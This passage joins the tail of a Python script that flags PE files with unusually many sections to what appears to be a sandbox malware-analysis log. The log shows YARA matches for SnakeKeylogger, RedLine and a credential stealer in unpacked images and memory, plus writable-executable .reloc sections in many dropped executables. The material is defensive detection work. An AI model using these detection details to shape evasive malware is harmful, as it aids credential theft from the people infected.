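        struct.pack("<8sIIIIIIHHI", n.encode("ascii"), 0, 0, 0, 0, 0, 0, 0, 0, 0)
        for n in names)
    return bytes(dos) + b"PE\0\0" + coff + table


if __name__ == "__main__":
    for names in ([".text", ".rdata", ".data", ".rsrc", ".reloc"],
                  [".s%02d" % i for i in range(12)]):
        count, fired = flag_many_sections(build_min_pe(names))
        print(count, "sections ->", "flagged" if fired else "ok", names)
```

Run against a real dropped file by passing `open(path, "rb").read()` to flag_many_sections(); the parser never touches the optional header contents, so it works on both PE32 and PE32+ images.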
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: unknown | Driver loaded: C:\Windows\System32\drivers\AppVStrm.sys
Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.2d30ee8.2.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.3ee6458.6.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.2a41f6e.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.2d30ee8.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.3f0f990.5.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.2a41f6e.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.5360000.7.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.3ee6458.6.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.2a41086.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine | snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.RegSvcs.exe.5360000.7.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 | date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2d30000.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2d30000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3f0f990.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.3ee5570.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 12.2.differences.exe.3ee0000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 15.2.RegSvcs.exe.2a41086.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000C.00000002.1924522530.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000F.00000002.2932151290.0000000002A01000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000004.00000002.1762544925.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0000000F.00000002.2966793878.0000000003EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2971534610.0000000005360000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0000000F.00000002.2944400846.0000000002D30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0000000A.00000002.1905647858.0000000004080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: x.exe.0.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AppVClient.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: armsvc.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: differences.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: alg.exe.1.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AutoIt3_x64.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: SciTE.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jjs.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jp2launcher.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: keytool.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: kinit.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: klist.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: ktab.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: AdobeARMHelper.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: orbd.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jaureg.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: pack200.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jucheck.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: policytool.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: jusched.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: java.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaw.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: javaws.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleCrashHandler64.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: GoogleUpdate.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: elevation_service.exe0.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: maintenanceservice.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7z.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: 7zFM.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  Source: rmid.exe.3.dr | Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
